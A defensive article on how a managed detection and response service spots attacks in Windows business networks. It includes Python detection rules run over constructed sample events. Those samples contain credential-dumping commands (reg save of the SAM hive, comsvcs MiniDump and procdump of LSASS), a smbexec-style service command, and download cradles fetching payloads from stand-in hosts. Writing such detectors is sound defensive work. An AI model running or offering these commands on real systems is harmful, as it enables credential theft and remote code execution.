How an MDR Service Can Detect Attacks in Business Infrastructure


In an increasingly complex and hostile digital environment, traditional security controls are no longer sufficient to detect advanced attacks. Attackers use techniques designed to slip past conventional firewalls and signature-based antivirus, which makes Managed Detection and Response (MDR) services essential for any company that wants to protect its systems from persistent threats.

For an MDR service to be truly effective, the protected infrastructure needs well-configured data sources: real-time telemetry collection, monitoring of critical events, and up-to-date threat intelligence. Below are the most important events an MDR service should analyze to detect attacks before they cause significant damage.

Main Events for Detecting Cyberattacks

1. Extraction of Sensitive Data from the Windows Registry

One of the most common techniques used by attackers is dumping the Windows Registry hives that hold credential material (known as registry hive dumping): the SAM hive stores local account password hashes, the SECURITY hive stores LSA secrets and cached domain credentials, and the SYSTEM hive stores the boot key needed to decrypt both. This technique, often carried out with the built-in reg save command, was observed in 27% of high-severity incidents analyzed in 2024.

MDR services detect this behavior through telemetry from Endpoint Detection and Response (EDR) agents installed on the protected systems, for example process-creation events that show a hive being saved or exported, and through Endpoint Protection Platform (EPP) components that flag unusual access to these registry keys.

2. Malware Execution in Memory

Modern attacks increasingly avoid writing malware to disk and instead execute it directly in memory, for example by injecting code into a legitimate process or running scripts that never touch the file system. This defeats detection by file-scanning antivirus.

According to MDR data, 17% of severe attacks in 2024 involved the execution of malware in memory. Identifying this type of threat requires in-memory scanning and behavioral monitoring built into EPP and EDR solutions, since there is no file on disk for a traditional scanner to inspect.

3. Creation and Execution of Suspicious Services

Attackers often abuse Windows services to execute malicious code with elevated (typically SYSTEM) privileges and to persist across reboots. In nearly 17% of the analyzed incidents, services were created whose binary path or arguments contained suspicious arbitrary code, such as a command shell or script interpreter in place of a genuine service executable.

To detect this, operating system event telemetry must be configured to record service installations (in Windows, System log Event ID 7045, plus Security Event ID 4697 when the corresponding audit subcategory is enabled) together with detailed process-creation data, so that the service name, binary path, start type and the account that created it are all available to the analyst.

4. Access to Malicious IP Addresses

One of the simplest but most effective indicators of a possible intrusion is communication with known malicious servers. Such connections, detected in 12% of high-severity incidents, can be monitored through:

  • IP reputation feeds.
  • Network traffic analysis using firewalls and a SIEM.
  • Monitoring of DNS and HTTP requests inside the company’s infrastructure.

An effective MDR service must be linked to a continuously updated threat-intelligence database so that these connections are flagged in real time; a stale list misses infrastructure the attacker registered last week.

5. Process Memory Dumping (LSASS Dumping)

Attackers aim to escalate privileges and move laterally by harvesting the credentials that the Local Security Authority Subsystem Service (LSASS) holds in memory for logged-on users, such as NTLM hashes and Kerberos tickets. Dumping the LSASS process memory was detected in 12% of severe attacks in 2024.

To identify these attempts, an MDR service should analyze:

  • Unusual behavior of processes running with elevated privileges (reading LSASS memory requires administrative rights, specifically SeDebugPrivilege).
  • Handles opened to the LSASS process, using EPP and EDR rules that flag memory-read access from processes that are not known security products.
  • Command lines that indicate credential dumping, for example procdump with the -ma option against lsass.exe, or rundll32 loading comsvcs.dll to call its MiniDump export.
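Sections 1 and 5 describe the same family of activity, credential material being read from the registry or from LSASS, and both are detectable from the same two telemetry records: process creation (command line) and process access (who opened a handle to lsass.exe and with which rights). The following Python example is added here to show that logic; it is not code from the original article or from any vendor product. The sample events are constructed in a simplified Sysmon-like shape, and the allowlist of security products that may legitimately read LSASS is an assumption for illustration; in production such an allowlist must be backed by signer verification, since a path alone is trivial to spoof.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape (not real logs).
# EventID 1 = process creation, EventID 10 = process access (GrantedAccess is the
# hex access mask of the opened handle, as Sysmon reports it).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg  save HKLM\SAM C:\Users\Public\sam.hiv", "User": "CORP\\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "User": "CORP\\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Temp\l.dmp full", "User": "CORP\\jdoe"},
    {"EventID": 1, "Image": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe out.dmp", "User": "CORP\\jdoe"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

# reg save / reg export of the hives that hold credential material.
REG_HIVE_RE = re.compile(
    r"\breg(\.exe)?\s+(save|export)\s+(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SECURITY|SYSTEM)\b",
    re.IGNORECASE)
# rundll32 comsvcs.dll MiniDump (the export can also be called by ordinal #24).
COMSVCS_RE = re.compile(r"comsvcs(\.dll)?\s*,?\s*(#24|MiniDump)", re.IGNORECASE)
# procdump -ma (full dump) of lsass.
PROCDUMP_RE = re.compile(r"\s-ma\b.*\blsass", re.IGNORECASE)

# Process access rights that allow reading or writing another process's memory.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
MEMORY_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Assumed allowlist (illustration only). Real deployments must verify the
# signer of the source image, not just its path.
LSASS_ACCESS_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}


def _normalize(command_line):
    """Collapse repeated whitespace so 'reg  save' and 'reg save' look alike."""
    return re.sub(r"\s+", " ", command_line).strip()


def check_process_create(event):
    """Return a rule name if the command line looks like credential dumping."""
    cmd = _normalize(event.get("CommandLine", ""))
    if REG_HIVE_RE.search(cmd):
        return "registry_hive_dump"
    if COMSVCS_RE.search(cmd):
        return "lsass_dump_comsvcs"
    if PROCDUMP_RE.search(cmd):
        return "lsass_dump_procdump"
    return None


def check_process_access(event):
    """Return a rule name if an unexpected process opened LSASS with memory rights."""
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    granted = int(event.get("GrantedAccess", "0"), 16)
    if not granted & MEMORY_RIGHTS:
        return None  # e.g. 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION, routine
    if event.get("SourceImage", "").lower() in LSASS_ACCESS_ALLOWLIST:
        return None
    return "lsass_memory_access"


def detect(events):
    """Run both checks over a stream of events and return the alerts raised."""
    alerts = []
    for event in events:
        rule = None
        if event.get("EventID") == 1:
            rule = check_process_create(event)
        elif event.get("EventID") == 10:
            rule = check_process_access(event)
        if rule:
            alerts.append({"rule": rule, "event": event})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], "<-", alert["event"].get("CommandLine") or alert["event"].get("SourceImage"))
```

Run against the constructed events, the four dumping attempts are flagged while the registry query, the Defender engine and the svchost handle with only query rights pass silently. The access-mask check is the part that matters most: requiring the memory-read bits rather than matching a literal "0x1FFFFF" catches tools that request only what they need (for example 0x1010), which is how many dumpers evade exact-mask rules.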

6. Execution of Low-Reputation Files

A file or script may not be immediately classified as malware, but if it has a low or unknown reputation, for example because it has rarely been seen or has appeared in earlier suspicious activity, its execution deserves detailed analysis. In 10% of detected attacks, the execution of files with dubious reputations was a key indicator of a potential security breach.

To mitigate this risk, the MDR service should integrate threat intelligence that identifies files with suspicious histories and, where the reputation is poor enough, blocks their execution rather than merely logging it.

7. Creation of Privileged Users

Beyond stealing credentials, some attackers create new accounts with elevated privileges to guarantee persistent access to the network. In 9% of the analyzed incidents, accounts were added to administrative groups in the corporate domain.

Monitoring of these events should include:

  • Logging of all account and group-membership changes on domain controllers and servers (in Windows, Security Event ID 4720 for account creation and 4728, 4732 and 4756 for additions to global, local and universal security groups).
  • Real-time alerts when an account gains elevated privileges without an approved change request, with particular attention to accounts that are made privileged minutes after being created.
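The events listed above are enough to build the detection this section calls for: watch the group-membership events for privileged groups, suppress changes that were approved, and correlate with account creation so that a brand-new account landing in Domain Admins is escalated. The Python below is an added example, not code from the article or from Kaspersky; the events, the approved-change list and the one-hour correlation window are all constructed assumptions for illustration. Field names follow the Windows Security log (TargetUserName is the group for 4728/4732/4756 and the new account for 4720; SubjectUserName is the actor).

```python
from datetime import datetime, timedelta

# Windows Security event IDs used by this rule.
USER_CREATED = 4720          # A user account was created
GROUP_ADD_EVENTS = {4728,    # member added to a security-enabled global group
                    4732,    # member added to a security-enabled local group
                    4756}    # member added to a security-enabled universal group

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins",
                     "administrators", "account operators", "backup operators", "dnsadmins"}

# Constructed list of approved (member, group) changes, assumed to be exported
# from a change-management system. Anything outside it is treated as unauthorized.
APPROVED_CHANGES = {("helpdesk-t2", "administrators")}

# Constructed sample events (not real logs), already flattened from EVTX/XML.
SAMPLE_EVENTS = [
    {"Time": "2024-03-01T09:00:00", "EventID": 4720, "TargetUserName": "svc-updater",
     "SubjectUserName": "jdoe"},
    {"Time": "2024-03-01T09:03:00", "EventID": 4728, "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc-updater,OU=Service Accounts,DC=corp,DC=local", "SubjectUserName": "jdoe"},
    {"Time": "2024-03-01T09:10:00", "EventID": 4732, "TargetUserName": "Administrators",
     "MemberName": "CORP\\helpdesk-t2", "SubjectUserName": "admin-ops"},
    {"Time": "2024-03-01T09:12:00", "EventID": 4728, "TargetUserName": "Marketing",
     "MemberName": "CN=asmith,OU=Users,DC=corp,DC=local", "SubjectUserName": "admin-ops"},
    {"Time": "2024-03-01T09:20:00", "EventID": 4756, "TargetUserName": "Enterprise Admins",
     "MemberName": "CN=jdoe,OU=Users,DC=corp,DC=local", "SubjectUserName": "jdoe"},
    {"Time": "2024-03-01T09:30:00", "EventID": 4728, "TargetUserName": "Backup Operators",
     "MemberName": "CN=bob,OU=Users,DC=corp,DC=local", "SubjectUserName": "admin-ops"},
]


def account_name(member):
    """Reduce the MemberName field to a bare account name.

    4728/4756 report the member as a distinguished name (CN=...), while 4732
    usually reports DOMAIN\\name (or only a SID, which this example does not resolve).
    """
    if member.upper().startswith("CN="):
        return member.split(",", 1)[0][3:]
    return member.rsplit("\\", 1)[-1]


def detect(events, new_account_window=timedelta(hours=1)):
    """Return alerts for unapproved additions to privileged groups.

    Severity is raised when the actor adds themself, or when the member was
    created (4720) within new_account_window before being made privileged.
    """
    created = {}   # account name (lower) -> creation time
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == USER_CREATED:
            created[ev["TargetUserName"].lower()] = t
            continue
        if ev["EventID"] not in GROUP_ADD_EVENTS:
            continue
        group = ev["TargetUserName"]
        if group.lower() not in PRIVILEGED_GROUPS:
            continue
        member = account_name(ev["MemberName"])
        if (member.lower(), group.lower()) in APPROVED_CHANGES:
            continue
        actor = ev["SubjectUserName"]
        rule, severity = "privileged_group_add", "high"
        if actor.lower() == member.lower():
            rule, severity = "self_elevation", "critical"
        created_at = created.get(member.lower())
        if created_at is not None and t - created_at <= new_account_window:
            rule, severity = "new_account_made_privileged", "critical"
        alerts.append({"rule": rule, "severity": severity, "member": member,
                       "group": group, "actor": actor, "time": ev["Time"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["time"]} {alert["severity"]:8} {alert["rule"]}: '
              f'{alert["actor"]} added {alert["member"]} to {alert["group"]}')
```

On the sample data the approved help-desk change and the Marketing group addition are ignored, the service account created three minutes before joining Domain Admins is escalated to critical, and jdoe adding himself to Enterprise Admins is flagged as self-elevation. In a real deployment the approved-change set would be refreshed from the ticketing system, and 4732 events that carry only a SID would need resolution before the name comparison.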

8. Remote Process Execution

Remote process execution was detected in more than 5% of cases. This includes commands launched from a compromised workstation on internal servers through administrative channels such as PsExec-style services, WMI or WinRM.

To detect these incidents, it is essential to:

  • Log all remotely launched processes together with their parent process, so that a shell spawned by WmiPrvSE.exe, wsmprovhost.exe or a freshly installed service stands out.
  • Monitor image loads (executables and DLLs mapped into process memory) to catch payloads delivered through these channels.
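Sections 3 and 8 meet in practice: remote execution tools such as PsExec and smbexec work by installing a short-lived service on the target (Event ID 7045), while WMI and WinRM leave a tell-tale parent process on the spawned command. The Python example below, added here and not taken from the article or from any vendor, runs both checks over constructed sample events: 7045 records with the fields Windows actually logs (ServiceName, ImagePath, AccountName) and Sysmon-style process-creation records with ParentImage. The service names, paths and command lines are made up for illustration; the parent-process names are the real hosts of WMI (WmiPrvSE.exe) and WinRM (wsmprovhost.exe) execution.

```python
import re

# Constructed sample events (not real logs). EventID 7045 mirrors the System log
# record "A service was installed in the system"; EventID 1 mirrors a Sysmon
# process-creation record that includes the parent process.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "BTAGService",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p",
     "AccountName": "NT AUTHORITY\\LocalService"},
    {"EventID": 7045, "ServiceName": "kzNfa",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "WinUpdateSvc", "ImagePath": r"C:\Users\Public\svc.exe",
     "AccountName": "LocalSystem"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /Q /c C:\Windows\Temp\execute.bat"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -enc SQBFAFgA"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

# Service binaries that are themselves remote-execution agents.
REMOTE_EXEC_SERVICE_BINARIES = {"psexesvc.exe"}

# A service whose "binary" is a shell, an interpreter, an encoded command or a
# file in a user-writable directory is not a normal service.
SUSPICIOUS_IMAGE_PATH_RE = re.compile(
    r"%COMSPEC%|\bcmd(\.exe)?\s+/[qkc]\b|powershell|\s-enc(odedcommand)?\b"
    r"|\\Users\\Public\\|\\Temp\\|\\AppData\\",
    re.IGNORECASE)

# Parents that host remotely initiated execution.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe": "wmi", "wsmprovhost.exe": "winrm", "psexesvc.exe": "psexec"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (handles env-var prefixes too)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_service_install(event):
    """Classify a 7045 record; returns a rule name or None."""
    image_path = event.get("ImagePath", "")
    tokens = image_path.strip('"').split()
    first_binary = basename(tokens[0]) if tokens else ""
    if event.get("ServiceName", "").lower() == "psexesvc" or first_binary in REMOTE_EXEC_SERVICE_BINARIES:
        return "remote_exec_service_installed"
    if SUSPICIOUS_IMAGE_PATH_RE.search(image_path):
        return "suspicious_service_image_path"
    return None


def check_process_create(event):
    """Classify a process-creation record by its parent; returns a rule name or None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent in REMOTE_EXEC_PARENTS:
        return "remote_exec_" + REMOTE_EXEC_PARENTS[parent]
    if parent == "services.exe" and child in SHELLS:
        # services.exe normally starts service binaries, not interactive shells;
        # a shell here is the classic footprint of service-based remote execution.
        return "service_spawned_shell"
    return None


def detect(events):
    """Run the two checks over an event stream and return the alerts raised."""
    alerts = []
    for event in events:
        rule = None
        if event.get("EventID") == 7045:
            rule = check_service_install(event)
        elif event.get("EventID") == 1:
            rule = check_process_create(event)
        if rule:
            alerts.append({"rule": rule, "event": event})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        ev = alert["event"]
        print(alert["rule"], "<-", ev.get("ServiceName") or ev.get("CommandLine"))
```

The two benign records (a stock svchost service and svchost started by services.exe) produce nothing; the other six are flagged. WmiPrvSE.exe also spawns processes for purely local WMI consumers such as management agents, so in production a remote_exec_wmi alert should be corroborated with a network logon (Security Event ID 4624, logon type 3) or an inbound Sysmon network connection from the source host shortly before the process start.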

9. Malicious URLs in Event Parameters

Some threats embed malicious links in system event parameters, most often in the command line of a suspicious process (for example a download cradle passed to powershell.exe or certutil.exe). This behavior was observed in nearly 5% of detected attacks.

To detect these attacks, an MDR service must have:

  • Parsing of command-line and script parameters in recorded events, so that embedded URLs and IP addresses are extracted even when they are defanged or lightly obfuscated.
  • Integration with URL, domain and IP reputation databases to check the extracted indicators.
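Sections 4 and 9 both reduce to the same check: pull a host out of a DNS query, a network connection or a command line, and match it against a reputation list. The Python example below is added here and is not part of the original article or of any vendor product. The reputation feed and the events are constructed (the addresses come from the RFC 5737 documentation ranges, the domains use the reserved .example names), and the event shape follows Sysmon (Event ID 22 DNS query, 3 network connection, 1 process creation). It goes a little beyond the text in three places practitioners usually get wrong: IPs are matched against CIDR ranges rather than exact strings, domains are matched label by label so that notevil.example does not match evil.example, and hxxp / [.] defanging is undone before lookup.

```python
import ipaddress
import re

# Constructed reputation data, assumed to come from a threat-intelligence feed.
MALICIOUS_NETWORKS = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.77/32")]
MALICIOUS_DOMAINS = {"evil.example", "cdn-update.example.net"}

# Constructed sample events in a Sysmon-like shape (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 22, "Image": r"C:\Windows\System32\svchost.exe", "QueryName": "files.evil.example."},
    {"EventID": 22, "Image": r"C:\Windows\System32\svchost.exe", "QueryName": "notevil.example"},
    {"EventID": 22, "Image": r"C:\Windows\System32\svchost.exe", "QueryName": "login.microsoftonline.com"},
    {"EventID": 3, "Image": r"C:\Users\jdoe\AppData\Local\Temp\upd.exe",
     "DestinationIp": "198.51.100.23", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23:8080/a.ps1')\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f hxxps://cdn-update[.]example.net/payload.exe p.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl -s https://www.example.org/index.html"},
]

# Captures the host part of a URL (scheme://host[:port]/...), including the
# defanged hxxp scheme and [.] separators. IPv6 literals in brackets are not handled.
URL_HOST_RE = re.compile(r"\b(?:hxxps?|https?|ftps?)://([A-Za-z0-9.\-\[\]]+)", re.IGNORECASE)


def normalize_host(host):
    """Undo common defanging, drop the trailing dot DNS logs add, lower-case."""
    return host.replace("[.]", ".").rstrip(".").lower()


def host_reputation(host):
    """Return a reason string if the host is on the list, else None.

    IP addresses are matched against CIDR ranges; names are matched on their
    own label boundaries (a listed domain also covers its subdomains).
    """
    host = normalize_host(host)
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        for net in MALICIOUS_NETWORKS:
            if addr in net:
                return f"ip:{net}"
        return None
    labels = host.split(".")
    for i in range(len(labels) - 1):          # never test the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in MALICIOUS_DOMAINS:
            return f"domain:{candidate}"
    return None


def extract_hosts(command_line):
    """All URL hosts found in a command line, normalized."""
    return [normalize_host(m.group(1)) for m in URL_HOST_RE.finditer(command_line)]


def detect(events):
    """Check DNS queries, connections and command-line URLs against the feed."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 22:
            hosts = [ev["QueryName"]]
        elif eid == 3:
            hosts = [ev["DestinationIp"]]
        elif eid == 1:
            hosts = extract_hosts(ev.get("CommandLine", ""))
        else:
            continue
        for host in hosts:
            reason = host_reputation(host)
            if reason:
                alerts.append({"EventID": eid, "image": ev.get("Image"),
                               "host": normalize_host(host), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f'{alert["EventID"]:>3} {alert["image"]}: {alert["host"]} ({alert["reason"]})')
```

Four of the eight constructed events are flagged: the DNS lookup of a subdomain of a listed domain, the connection into the listed /24, the PowerShell cradle fetching from an IP in that same range (the port is stripped before matching), and the defanged certutil download. The label-based match is what keeps notevil.example clean while still catching files.evil.example; a naive endswith() would get the first case wrong.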

Key Telemetry Sources for an Efficient MDR

For an MDR service to be truly effective in detecting advanced attacks, it must have access to multiple telemetry sources. Among the most important are:

  1. Telemetry from EPP and EDR
    • Logging of running processes and services.
    • Behavioral analysis of code executing in memory.
    • Monitoring of access to the Windows registry and to the LSASS process.
  2. Operating System Events
    • Detailed logs of activity in Windows (security events, processes, accesses).
    • Proper configuration of the Linux audit subsystem (auditd).
    • Use of tools like Sysmon, which adds detailed process, network and file telemetry to Windows logging.
  3. Network Device Logs
    • Firewalls and web filters configured to capture suspicious connection attempts.
    • DNS and HTTP traffic analysis to detect communications with malicious servers.
  4. Cloud Service Logs
    • Monitoring of accesses and modifications on SaaS platforms.
    • Configuration of auditing in tools like AWS CloudTrail to log critical events.

Conclusion: The Importance of Early Detection

Cyberattacks are becoming increasingly sophisticated and can easily evade traditional defenses. A well-implemented MDR service not only adds a layer of defense but also identifies intrusions in near real time, preventing attacks from spreading through the corporate infrastructure.

Effective detection depends on a proper configuration of telemetry, proactive monitoring, and integration of up-to-date threat intelligence. Organizations that invest in MDR can drastically reduce the risk of security breaches, protecting both their data and their reputation.

Source: Kaspersky Reports
